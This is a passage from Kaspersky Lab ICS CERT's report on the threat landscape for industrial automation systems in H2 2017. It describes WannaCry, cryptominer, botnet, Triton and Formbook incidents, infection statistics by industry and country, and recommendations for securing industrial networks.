industrial network than in an office network. To demonstrate this, we look at two incidents investigated by the Kaspersky Lab ICS-CERT team.\n\nIn H2 2017, we were approached by several industrial enterprises at once, where mass infections of industrial networks with WannaCry encryption malware had been detected. It was later determined that the initial infections of office networks at the victim companies had in all the cases taken place back in the first half of 2017, at the height of the WannaCry outbreak. However, the infections were not noticed until the malware propagated to the enterprises' industrial networks. As it turned out during investigation, encryption functionality in the malware samples was damaged and the infected systems on corporate networks continued to operate normally, without any failures. However, the infection of industrial networks in these cases had unexpected negative consequences.\n\nAt one of the enterprises infected by WannaCry, the workstations used by operators started to bring up the Blue Screen of Death all the time, leading to emergency reboots. The reason for this unexpected consequence of infection was that the machines ran Windows XP. It is a well-known fact that the DoublePulsar exploit used by WannaCry to propagate causes WindowsXP to crash, resulting in a Blue Screen of Death and a reboot. In cases when numerous machines in the industrial segment of an organization's network are infected, WindowsXP machines are often attacked and go into emergency reboots. As a result, operators are rendered incapable of monitoring and controlling the industrial process. This makes WannaCry a denial-of-service attack tool of sorts.\n\nIn another incident, the propagation of WannaCry caused some of the devices on an enterprise's industrial network to become temporarily unavailable during periods when the network activity of the malware coincided with certain stages in the industrial process. This resulted in emergency interruptions of an industrial process that was critical for the enterprise for an average of 15 minutes.\n\n#### Cryptocurrency miners in industrial network infrastructure\n\nAccording to Kaspersky Lab ICS CERT data, cryptocurrency mining programs attacked 3.3% of industrial automation system computers during the period from February 2017 to January 2018.\n\nUp to August 2017, the percentage of ICS computers attacked by cryptocurrency miners did not exceed 1%. This figure grew in September and did not go back to less than 1% for the rest of 2017. In October, cryptocurrency miner attacks against ICS computers peaked, with 2.07% of ICS computers being attacked.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130449/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-6.png>)\n\n_Percentage of ICS computers attacked by cryptocurrency mining malware_\n\nLike other malware infecting systems at industrial enterprises, cryptocurrency miners can pose a threat to industrial process monitoring and control. In the process of its operation, malware of this type creates a significant load on the computer's computational resources. An increased load on processors can negatively affect the operation of the enterprise's ICS components and threaten their stability.\n\nAccording to our assessments, in most cases cryptocurrency miners infect ICS computers accidentally. There is no reliable information on machines that are part of the industrial network infrastructure being infected as a result of targeted attacks the goal of which is to mine cryptocurrencies, with the exception of cases when miners are installed by unscrupulous employees of victim enterprises. The cryptocurrency mining malware typically enters the industrial network infrastructure from the internet or, less commonly, from removable media or network shares.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130456/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-7.png>)\n\n_Sources of ICS computer infections with cryptocurrency miners_ \nPercentage of systems attacked, February 2017 \u2013 January 2018_\n\nCryptocurrency miners have infected numerous websites, including those of industrial companies. In such cases, cryptocurrencies are mined on the systems of users who visit infected web resources. This technique is called cryptojacking.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130503/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-8.png>)\n\n__Screenshot showing a fragment of code found on a web resource infected with mining malware __\n\n#### Botnet agents in the industrial network infrastructure\n\nIn most cases, the functionality of botnet agents includes searching for and stealing financial information, stealing authentication data, brute forcing passwords, sending spam, as well as conducting attacks on specified remote internet resources, including denial-of-service (DDoS) attacks. In addition, in cases where a botnet agent attacks third-party resources (such cases have been detected), the companies that own the IP addresses from which the attacks are launched may face certain reputational risks.\n\nAlthough the destructive activity of botnet agents is not specifically designed to disrupt the operation of any industrial system, an infection with this type of malware may pose a significant threat to a facility that is part of the industrial infrastructure. Malware of this type can cause network failures, denial of service (DoS) of the infected system and other devices on the network. It is also common for malware to contain errors in its code and/or be incompatible with software used to control the industrial infrastructure, potentially resulting in the disruption of industrial process monitoring and control.\n\nAnother danger associated with botnet agents is that malware of this type often includes data collection functionality and, like backdoor malware, enables the attackers to control the infected machine surreptitiously. System data collected by bots by default is sufficient for accurately identifying the company that owns the system and the type of the infected system. What's more, access to machines infected with botnet agents is often put up for sale at specialized exchanges on the Darknet. Consequently, threat actors interested in infected industrial control systems can gain access to a victim company's sensitive data and/or systems used to control the industrial infrastructure.\n\nIn 2017, 10.8% of all ICS systems were attacked by botnet agents. Moreover, botnet agent attack statistics show that 2% of ICS systems were attacked by several malicious programs of this type at once.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130511/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-9.png>)\n\n_Percentage of ICS computers attacked by botnet agents in 2017_\n\nThe main sources of botnet agent attacks on ICS systems in 2017 were the internet, removable media and email messages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130518/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-10.png>)\n\n_Sources of ICS infection with botnet agents, percentage of ICS computers attacked, 2017_\n\nThis once again demonstrates the need for access control to ensure that information is exchanged securely between an enterprise's industrial network and other networks, as well as the need to block unauthorized removable media from connecting to ICS systems and to install tools designed to detect and filter malicious objects from email messages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130524/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-11.png>)\n\n_Top 5 botnet agent most commonly found on ICS systems in 2017, \npercentage of ICS computers attacked_\n\nNearly two percent of all systems analyzed were attacked with Virus.Win32.Sality malware. In addition to infecting other executable files, this malware includes the functionality of resisting antivirus solutions and downloading additional malicious modules from the command-and-control server. The most widespread Sality modules are components for sending spam, stealing authentication data stored on the system and downloading and installing other malware.\n\nThe Dinihou botnet agent, which attacked 0.9% of ICS systems analyzed, is in second position. The malware includes functionality that enables the attackers to upload an arbitrary file from an infected system, creating the threat of sensitive data leaks for victim organizations. In addition, both Worm.VBS.Dinihou and Virus.Win32.Nimnul, which is in third place with 0.88%, can be used to download and install other malware on infected systems.\n\nMost modifications of Trojan.Win32.Waldek are distributed via removable media and include functionality to collect information on infected systems and send it to the attackers. Based on the system data collected, the attackers create packages of additional malware to be installed on the infected system using the relevant Waldek functionality.\n\nThe fifth position is taken up by Backdoor.Win32.Androm, which ranked highest based on the number of attacks on ICS systems in H2 2016. The malware provides the attackers with a variety of information on the infected system and enables them to download and install modules for performing destructive activities, such as stealing sensitive data.\n\n### Targeted attacks\n\n2017 saw the publication of information on two targeted attacks on systems that are part of the industrial infrastructure \u2013 [Industroyer](<https://ics-cert.kaspersky.com/reports/2017/09/28/threat-landscape-for-industrial-automation-systems-in-h1-2017/#21>) and [Trisis/Triton](<https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html>). In these attacks, for the first time since Stuxnet, threat actors created their own implementations of industrial network protocols, gaining the ability to communicate with devices directly.\n\n#### Trisis/Triton\n\nIn December 2017, researchers reported discovering previously unknown malware that targeted critical infrastructure systems. The discovery was made as a result of investigating an incident at an unnamed industrial enterprise. The malicious program was dubbed Triton or Trisis.\n\nThe malware is a modular framework that can automatically find Triconex Safety Controllers on the enterprise network, get information on their operating modes and plant malicious code on these devices. Trisis/Triton embeds a backdoor in the device's firmware, enabling the attackers to remotely read and modify not only the code of the legitimate control program, but also the code of the compromised Triconex device's firmware. With such capabilities, attackers can do serious damage to the enterprise's industrial process. The least harmful of possible negative consequences is the system's emergency shutdown and interruption of the industrial process. It was this type of event that caused a victim organization to launch an investigation, which resulted in the attack being detected.\n\nIt remains unknown how the attackers penetrated the enterprise's infrastructure. What is known is that they must have been inside the compromised organization's network for a sufficiently long time (several months) and used legitimate software and 'dual-use' utilities for lateral movement and privilege escalation.\n\nAlthough the attack was designed to modify code on Triconex devices, the code that the attackers were apparently trying to inject in the last stage of the attack has never been found, so it is currently impossible to determine the final objective of the attack.\n\n#### Spear phishing \u2014 Formbook spyware\n\nSpear phishing attacks on industrial organizations continued in the second half of 2017. We have already [written](<https://ics-cert.kaspersky.com/reports/2017/06/15/nigerian-phishing-industrial-companies-under-attack/>) about spear phishing used by threat actors in Business Email Compromise (BEC) attacks. Compared to attacks described earlier, the attackers' tactics have not changed significantly. However, in addition to known Trojan-Spy malware sent in phishing emails to global industrial and energy companies (FareIT, HawkEye, ISRStealer, etc.), a new representative of this malware class \u2013 Formbook \u2013 gained popularity in the second half of 2017.\n\nFormbook attacks involve sending phishing emails with malicious Microsoft Office documents attached. To download and install malware on target systems, these documents exploit the CVE-2017-8759 vulnerability or use macros. Some phishing emails include attached archives of different formats containing the malicious program's executable file. Examples of attached file names:\n\n * RFQ for Material Equipment for Aweer Power Station H Phase IV.exe\n * Scanned DOCUMENTS & Bank Details For Confirmation.jpeg (Pages 1- 4) -16012018. jpeg.ace\n * PO & PI Scan.png.gz\n * zip\n * QUOTATION LISTS.CAB\n * shipping receipts.ace\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130531/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-12.png>)\n\n_Sample phishing email used to distribute Formbook_\n\nIn terms of implementation and the techniques used to obfuscate the code and encrypt the payload, Formbook differs from its 'peers' in that its functionality is more extensive. In addition to standard spyware features, such as making screenshots, capturing keypresses and stealing passwords stored in browsers, Formbook can steal sensitive data from HTTP/HTTPS/SPDY/HTTP2 traffic and web forms. Additionally, the malware implements remote system control functionality and uses an unusual technique to resist the analysis of network traffic. The Trojan generates a set of URLs to which it is going to connect, using a list of legitimate domains stored in its body. It then adds one URL for its command-and-control server. In this way, the malware attempts to mask its connections to the malicious domain by sending numerous requests to legitimate resources, making its detection and analysis more difficult.\n\n## Threat statistics\n\n_All statistical data used in this report was collected using the _[_Kaspersky Security Network_](<https://kas.pr/Gzu1>)_ (KSN), a distributed antivirus network. The data was received from those KSN users who gave their consent to have data anonymously transferred from their computers. We do not identify the specific companies/organizations sending statistics to KSN, due to the product limitations and regulatory restrictions._\n\n### Methodology\n\nThe data was received from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:\n\n * supervisory control and data acquisition (SCADA) servers,\n * data storage servers (Historian),\n * data gateways (OPC),\n * stationary workstations of engineers and operators,\n * mobile workstations of engineers and operators,\n * Human Machine Interface (HMI).\n\nThe statistics analyzed also include data received from computers of industrial control network administrators and software developers who develop software for industrial automation systems.\n\nFor the purposes of this report, attacked computers are those on which our security solutions have been triggered at least once during the reporting period. When determining percentages of machines attacked, we use the ratio of _unique_ computers attacked to all computers in our sample from which we received anonymized information during the reporting period.\n\nICS servers and stationary workstations of engineers and operators often do not have full-time direct internet access due to restrictions specific to industrial networks. Internet access may be provided to such computers, for example, during maintenance periods.\n\nWorkstations of system/network administrators, engineers, developers and integrators of industrial automation systems may have frequent or even full-time internet connections.\n\nAs a result, in our sample of computers categorized by Kaspersky Lab ICS CERT as part of the industrial infrastructure of organizations, about 40% of all machines have regular or full-time internet connections. The remaining machines connect to the Internet no more than once a month, many less frequently than that.\n\n### Percentage of computers attacked\n\nIn the second half of 2017, Kaspersky Lab products blocked attempted infections on **37.8%** of ICS computers protected by them, which is 0.2 percentage points more than in the first half of 2017 and 1.4 percentage points less than in the second half of 2016.\n\nJune \u2013 August 2017 saw a decline in the number of attacked computers. However, in September there was a notable increase in cybercriminal activity, with the proportion of attacked machines rising to 20% and not falling below that level again for the rest of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130539/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-13.png>)\n\n__Percentage of ICS computers attacked globally by month, 2017__\n\nWhen comparing these values with the same period in 2016, we see that the July numbers are practically identical. However, for all other months the percentage of attacked machines in 2016 was higher than in 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130545/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-14.png>)\n\n_Percentage of ICS computers attacked globally by month, H2 2017 vs H2 2016_\n\nA certain decrease in the percentage of computers attacked can be attributed to several factors. It is likely that one has to do with industrial enterprises paying more attention to the security of industrial segments on their networks. According to our experts' assessments, changes for the better may be largely due to simple measures: enterprises have begun to conduct audits of the industrial segments of their networks, train employees in the principles of cyber-hygiene, more properly differentiate access rights between the corporate and the industrial segments of their network, etc.\n\n### Percentage of ICS computers attacked in different industries\n\nAccording to our assessment, medium-size and large companies with mature IT security processes tend to use Kaspersky Lab corporate solutions (mainly Kaspersky Industrial CyberSecurity and Kaspersky Endpoint Security) to safeguard their ICS infrastructure. Many smaller organizations and individual engineers, along with companies whose IT and OT cybersecurity still leaves much to be desired, may rely on Kaspersky Lab consumer solutions to protect their ICS computers. The percentage of such computers attacked by malware during the reporting period is significantly higher compared to the corresponding figures for computers protected by corporate products.\n\nWe intentionally excluded statistics coming from our consumer solutions when analyzing attacks on industrial facilities in different industries, using only telemetry data coming from Kaspersky Lab products for corporate users. This resulted in lower average attacked computers percentage values than for the rest of the analysis results presented in this report, where both Kaspersky Lab corporate and consumer product statistics were used.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130552/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-15.png>)\n\n_Percentage of ICS computers attacked in different industries*, H2 2017 vs H1 2017_\n\n*In this report, unlike our previous reports, we calculated the percentage of attacked ICS computers for each industry (the percentage of ICS computers attacked in an industry to all ICS computers in that industry).\n\nIn previous reports, we included the distribution of attacked ICS computers by industry (the percentage of computers attacked in a given industry to all attacked computers in our sample).\n\nAccording to statistics on attacks against facilities in different industries, nearly all industries demonstrate similar percentages of attacked ICS computers, which are in the range from 26 to 30 percent. We believe this may be due to the similarity of ICS architectures used to automate industrial processes at enterprises in various industries and, possibly, similarities in the processes used by enterprises to exchange information with external entities and inside the enterprises themselves.\n\nTwo industries were attacked more than others during the reporting period: the figures for Energy (38.7%) and Engineering & ICS Integrators (35.3%) are above 35%.\n\nWe believe that the high percentage of attacked ICS systems in the energy sector may be explained, on the one hand, by the greater network connectivity of electric power sector facilities (compared to facilities in other industries) and, on the other hand, perhaps by the fact that, on average, more people have access to the industrial control systems of energy sector facilities than to those at enterprises in other industries.\n\nThe supply chain attack vector has infamously been used in some devastating attacks in recent years, which is why the high percentage of attacked ICS computers in Engineering and ICS Integration businesses is a problem that is serious enough to be noticed.\n\nThe only industry whose figures showed a significant growth in the six months (+ 5.2 p.p.) is Construction (31.1%). The reason for the high percentage of ICS computers attacked in construction organizations could be that, for enterprises in the industry, industrial control systems often perform auxiliary functions, were introduced a relatively short time ago and are consequently at the periphery of company owners' and managers' attention. The upshot of this may be that objectives associated with protecting these systems from cyberthreats are regarded as having a relatively low priority. Whatever the reason for the high percentage of attacks reaching industrial control systems in construction and engineering, the fact seems sufficiently alarming. Construction is known to be a highly competitive business and cyberattacks on industrial organizations in this industry can be used as a means of unfair competition. So far, cyberattacks have been used in the construction industry mainly for purposes associated with the theft of commercial secrets. Infecting industrial control systems may provide threat actors with a new weapon in their fight against competitors.\n\nThe three least attacked industries are Mining (23.5%), Logistic & Transportation (19.8%) and ICS Software Development (14.7%).\n\nICS vendor infections might be very dangerous, because the consequences of an attack, spread over the infected vendor's partner ecosystem and customer base, could be dramatic, as we saw in the recent wide-scale incidents, such as the exPetr malware epidemic.\n\nThis report includes information on ICS computers at educational facilities. These figures include not only ICS systems used in demonstration stands and labs performing instructional and research functions, but also in industrial automation systems of various facilities that are part of the infrastructure of educational establishments, such as power supply systems (including power generation and distribution), utilities, etc., as well as ICS used in pilot production facilities.\n\nThe figure for educational establishments can be regarded as representing the \"background level\" of accidental threats affecting ICS systems, considering systems at educational establishments to be as insecure as such systems can get. This is because ICS systems at educational establishments are usually connected to the respective organizations' general-purpose networks and are less isolated from the outside world than the systems of industrial facilities.\n\nAt the same time, we believe that attacks on ICS systems at educational establishments can also pose a significant threat to enterprises in different real-sector industries \u2013 primarily because universities/colleges maintain working contacts and engage in collaboration with industrial enterprises. This includes joint research labs, engineering and development centers, personnel training and career development centers, etc.\n\nIn addition, such ICS systems can be used by attackers to test and debug malicious code and refine attacks against real-sector enterprises.\n\nEducation demonstrates the greatest difference between the H1 and H2 percentages of ICS systems attacked. The high figure for H1 was due to the large number of internet-borne attacks, as well as attacks by malware belonging to the [Trojan.Multi.Powercod](<https://securelist.com/fileless-attacks-against-enterprise-networks/77403/>) family. That malware uses techniques that are similar to those described by our colleagues [here](<https://securelist.com/fileless-attacks-against-enterprise-networks/77403/>). In H1 2017, 9.8% of ICS computers in educational establishments from our sample were attacked by Powercod Trojans. In H2, the corresponding figure was 0.7%.\n\n### Sources of industrial automation system infection\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130558/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-16.png>)\n\n_Main sources of threats blocked on ICS computers, \npercentage of ICS computers attacked, H2 2017 vs H1 2017_\n\nIn the second half of 2017, most of the numbers for the main infection sources remained at H1 2017 levels.\n\nFor computers that are part of the industrial infrastructure, the internet remains the main source of infection. Contributing factors include interfaces between corporate and industrial networks, availability of limited internet access from industrial networks, and connection of computers on industrial networks to the internet via mobile phone operator networks (using mobile phones, USB modems and/or Wi-Fi routers with 3G/LTE support). Contractors, developers, integrators and system/network administrators that connect to the control network externally (directly or remotely) often have unrestricted internet access. Their computers are in the highest-risk group and can be used by malware as a channel for penetrating the industrial networks of the enterprises they serve. As we mentioned above, about 40% of computers in our sample connect to the internet on a regular basis. It should be noted that, in addition to malicious and infected websites, the \"Internet\" category includes phishing emails and malicious attachments opened in web-based email services (in browsers).\n\nExperts from Kaspersky Lab ICS-CERT note that malicious programs and scripts built into email message bodies are often used in targeted attacks on industrial enterprises. In most cases, the attackers distribute emails with malicious attachments in office document formats, such as Microsoft Office and PDF, as well as archives containing malicious executable files.\n\nThere has also been a 1.7 p.p. decrease in the proportion of threats detected while scanning removable media. This is an important indicator, because such devices are often used to transfer information in industrial networks.\n\nThe other figures did not change appreciably.\n\n### Classes of malware\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130605/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-17.png>)\n\n_Malware classes, percentage of ICS computers attacked, H2 2017_\n\nTrojan malware, which is designed to penetrate the systems being attacked, deliver and launch other malware modules, remains relevant to ICS computers. The malicious code of these programs was most commonly written in scripting languages (Javascript, Visual Basic Script, Powershell, AutoIt in the AutoCAD format) or took the form of Windows shortcuts (.lnk) that pointed to the next malicious modules.\n\nThese Trojans most often tried to download and execute the following malware as main modules:\n\n * spyware Trojans (Trojan-Spy and Trojan-PSW)\n * ransomware (Trojan-Ransom)\n * backdoors (Backdoor)\n * remote administration tools installed without authorization (RAT)\n * Wiper type programs (KillDisk) designed to delete (wipe) data on the hard drive and render the computer unusable\n\nMalware infections of computers on an industrial network can result in the loss of control or the disruption of industrial processes.\n\n### Platforms used by malware\n\nIn the second half of 2017, we saw a significant increase in the percentage of ICS computers affected by malware written for the JavaScript platform.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130613/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-18.png>)\n\n_Platforms used by malware, percentage of ICS computers attacked, H2 2017 vs H1 2017_\n\nThe main reason for growing figures for the JavaScript platform is the increase in the number of phishing emails that include a loader for Trojan-Ransom.Win32.Locky.\n\nIn the latest versions of such emails, the attackers used a fax-received notification template.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130621/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-19.png>)\n\nThe phishing emails include an attachment \u2013 an obfuscated loader written in JavaScript and designed to download and execute the main malicious module from servers controlled by the attackers.\n\nIt is important to note that threat actors often attack legitimate websites in order to host malware components on these sites. Threat actors do this to hide malicious traffic behind legitimate domains to mask the traces of an attack.\n\nCryptocurrency miners also made a small contribution to the increase in the share of the JavaScript platform \u2013 both the versions for browsers and the script-based loaders of miners for the Windows platform.\n\n### Geographical distribution of attacks on industrial automation systems\n\nThe map below shows the percentages of industrial automation systems attacked to the total number of such systems in each country.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130629/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-20.png>)\n\n_Geographical distribution of attacks on industrial automation systems, H2 2017 \nPercentage of attacked ICS computers in each country_\n\nTOP 15 countries by percentage of ICS computers attacked:\n\n| **Country*** | **% of systems attacked** \n---|---|--- \n1 | Vietnam | 69.6 \n2 | Algeria | 66.2 \n3 | Morocco | 60.4 \n4 | Indonesia | 60.1 \n5 | China | 59.5 \n6 | Egypt | 57.6 \n7 | Peru | 55.2 \n8 | Iran | 53.0 \n9 | India | 52.4 \n10 | Kazakhstan | 50.1 \n11 | Saudi Arabia | 48.4 \n12 | Mexico | 47.5 \n13 | Russia | 46.8 \n14 | Malaysia | 46.7 \n15 | Turkey | 44.1 \n \n*_Countries in which the number of ICS computers monitored by Kaspersky Lab ICS CERT was insufficient to obtain representative data sets were excluded from the ranking._\n\nThe Top 5 has remained unchanged since H1 2017.\n\nThe least affected countries in this ranking are Israel (8.6%), Denmark (13.6%), the UK (14.5%), the Netherlands (14.5%), Sweden (14.8%) and Kuwait (15.3%).\n\nEgypt has moved from ninth place to sixth \u2013 the percentage of attacked ICS machines in that country grew by 6.1 p.p. This is the most significant growth among all countries of the world. Internet threats accounted for most of the growth in the percentage of attacked ICS computers in Egypt. Among the internet threats detected, the most common were sites infected with script-based cryptocurrency miners and attempts to download malware by following URL links.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130636/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-21.png>)\n\n_Main sources of threats blocked on ICS computers in Egypt \npercentage of ICS computers attacked, H2 2017 vs H1 2017_\n\nMalware distributed via removable media is also a real problem for many ICS in Egypt. Malware loaders distributed on removable media are disguised as existing user files on the removable drive, increasing the chances of a successful attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130643/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-22.png>)\n\n_Examples of names used for loaders of malware distributed via removable media that were blocked on ICS computers in Egypt in H2 2017_\n\nIn most cases, the loaders that we detected were designed to launch the malware module responsible for infecting the system, including downloading the main module, infecting removable media and network shares and propagating via email/instant messengers to an existing list of contacts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130652/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-23.png>)\n\n_Malicious code for the AutoIt platform, launched by a malicious .lnk loader \nblocked on an ICS computer in Egypt in H2 2017_\n\nIn Russia during H2 2017, 46.8% of ICS computers were attacked at least once \u2013 a 3.8 p.p. rise on H1 2017. This saw Russia move up from 21st to 13th.\n\nThe proportions of attacked ICS machines vary greatly between different regions of the world.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130701/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-24.png>)\n\n_Percentage of ICS systems attacked in regions of the world, H2 2017 vs H1 2017_\n\nAll regions can be assigned to one of three groups according to the percentage of attacked ICS machines:\n\n 1. Proportion of attacked ICS systems below 30%. This group includes North America and Europe, where the situation looks the most peaceful. Kaspersky Lab ICS CERT specialists say this does not necessarily mean that industrial enterprises in these regions are less frequently attacked by cybercriminals; rather, it could be that more attention is paid to ensuring information security at industrial enterprises in these regions, which results in fewer attacks reaching ICS.\n 2. Proportion of attacked ICS systems between 30% and 50%. This group includes Latin America, Russia and the Middle East.\n 3. Proportion of attacked ICS systems above 50%. The situation is most acute in Africa and the Asia-Pacific region.\n\nIt should be noted that values may differ significantly between countries within the same region. This may be due to different practices and approaches to ICS information security in those countries.\n\nIn particular, the Asia-Pacific region includes Vietnam with the highest global proportion of attacked ICS systems (69.6%) alongside countries such as Japan (25%), Australia (24.1%) and Singapore (23.2%), where figures did not exceed 25%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130707/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-25.png>)\n\n_Percentage of attacked ICS computers in Asia-Pacific countries, H2 2017 vs H1 2017_\n\nIn Europe, Denmark's score (13.6%) was not only the lowest in the region but also one of the lowest globally, while the proportions of attacked ICS systems in Belarus (41%), Portugal (42.5%) and Ukraine (41.4%) were all above 40%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130713/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-26.png>)\n\n_Percentage of attacked ICS computers in Europe, H2 2017 vs H1 2017_\n\nLet's now look at the sources of attacks that affected ICS systems in different regions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130719/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-27.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130725/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-28.png>)\n\n_Main sources of threats blocked on ICS computers in different regions, H2 2017_\n\nIn all regions of the world, the internet remains the main source of attacks. However, in Europe and North America, the percentage of blocked web-borne attacks is substantially lower than elsewhere. This may be because most enterprises operating in those regions adhere to information security standards. In particular, internet access is restricted on systems that are part of industrial networks. The situation is similar for infected removable devices: the highest numbers are seen in Africa and the Asia-Pacific region, while the lowest are in Europe and North America. These figures also reflect the level of compliance with information security standards and, in particular, whether restrictions are in place to prevent the connection of unauthorized removable media to industrial infrastructure systems.\n\nCuriously, in spite of the sufficiently high overall percentage of attacks that reached ICS systems, the percentages of ICS computers attacked via removable media and email clients in Russia were relatively small \u2013 4.4% and 1.4% respectively. One possible explanation is that risks associated with these attack vectors are largely mitigated through organizational measures, as well as removable media and email handling practices established at industrial enterprises. This interpretation is reassuring, since removable media and email are often used as penetration vectors in sophisticated targeted and APT attacks.\n\nFor countries of the Middle East, email was a significant (5%) source of infection, with the region leading the ranking based on this parameter.\n\n## Our recommendations\n\nTo prevent accidental infections in industrial networks, we recommend taking a set of measures designed to secure the internal and external perimeters of these networks.\n\nThis includes, first and foremost, measures required to provide secure remote access to automation systems and secure transfer of data between the industrial network and other networks that have different trust levels:\n\n * Systems that have full-time or regular connections to external networks (mobile devices, VPN concentrators, terminal servers, etc.) should be isolated into a separate segment of the industrial network \u2013 the demilitarized zone (DMZ);\n * Systems in the demilitarized zone should be divided into subnets or virtual subnets (VLAN), with restricted access between subnets (only the communications that are required should be allowed);\n * All the necessary communication between the industrial network and the outside world (including the enterprise's office network) should be performed via the DMZ;\n * If necessary, terminal servers that support reverse connection methods (from the industrial network to the DMZ) can be deployed in the DMZ;\n * Thin clients should be used whenever possible to access the industrial network from the outside (using reverse connection methods);\n * Access from the demilitarized zone to the industrial network should be blocked;\n * If the enterprise's business processes are compatible with one-way communication, we recommend that you consider using data diodes.\n\nThe threat landscape for industrial automation systems is continually changing, with new vulnerabilities regularly found both in application software and in industrial software. Based on the threat evolution trends identified in H2 2017, we recommend placing special emphasis on the following security measures:\n\n * Regularly updating the operating systems, application software and security solutions on systems that are part of the enterprise's industrial network;\n * Installing firmware updates on control devices used in industrial automation systems in a timely manner;\n * Restricting network traffic on ports and protocols used on the edge routers between the organization's network and those of other companies (if information is transferred from one company's industrial network to another company);\n * An emphasis on account control and password policies is recommended. Users should have only those privileges that are required for them to perform their responsibilities. The number of user accounts with administrative privileges should be as limited as possible. Strong passwords (at least 9 characters, both upper and lower case, combined with digits and special characters) should be used, with regular password changing enforced by the domain policy, for example, every 90 days.\n\nTo provide protection from accidental infections with new, previously unknown malware and targeted attacks, we recommend doing the following on a regular basis:\n\n 1. Taking an inventory of running network services on all hosts of the industrial network; where possible, stopping vulnerable network services (unless this will jeopardize the continuity of industrial processes) and other services that are not directly required for the operation of the automation system; special emphasis should be made on services that provide remote access to file system objects, such as SMB/CIFS and/or NFS (which is relevant in the case of attacks on systems running Linux).\n 2. Auditing ICS component access control; trying to achieve maximum access granularity.\n 3. Auditing the network activity in the enterprise's industrial network and at its boundaries. Eliminate any network connections with external and other adjacent information networks that are not required by industrial processes.\n 4. Verifying the security of remote access to the industrial network; placing a special emphasis on whether demilitarized zones are set up in compliance with IT security requirements. To the fullest extent possible, minimizing or completely eliminating the use of remote administration tools (such as RDP or TeamViewer). More details on this are provided above.\n 5. Ensuring that signature databases, heuristics and decision algorithms of endpoint security solutions are up-to-date. Checking that all the main protection components are enabled and running and that ICS software folders, OS system folders or user profiles are not excluded from the scope of protection. Application startup control technologies configured in whitelisting mode and application behavior analysis technologies are particularly effective for industrial enterprises. Application startup control will prevent cryptomalware from running even if it finds its way on to the computer, while application behavior analysis technologies are helpful for detecting and blocking attempts to exploit vulnerabilities (including unknown) in legitimate software.\n 6. Auditing policies and practices related to using removable media and portable devices. Blocking devices that provide illegitimate access to external networks and the Internet from being connected to industrial network hosts. Wherever possible, disabling the relevant ports or controlling access to these ports using properly configured dedicated tools.\n\nIn addition, to provide protection from targeted attacks directed at the enterprise's industrial network and its main industrial assets, we recommend deploying tools that provide network traffic monitoring and detection of cyberattacks on industrial networks. In most cases, such measures do not require any changes to ICS components or their configuration and can be carried out without suspending their operation.\n\nOf course, completely isolating the industrial network from adjacent networks is virtually impossible, since transferring data between networks is required to perform a variety of important functions \u2013 controlling and maintaining remote facilities, coordinating sophisticated industrial processes, parts of which are distributed between numerous workshops, lines, plants and support systems. We hope, however, that our recommendations will help you provide maximum protection for your industrial networks and automation systems against existing and future threats.\n\n_**Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT)** is a global project of Kaspersky Lab aimed at coordinating the work of industrial automation system vendors, owners and operators of industrial facilities and IT security researchers in addressing issues associated with protecting industrial enterprises and critical infrastructure facilities._\n\n[ **Read the full \"Threat Landscape for Industrial Automation Systems in H2 2017\" report (English, 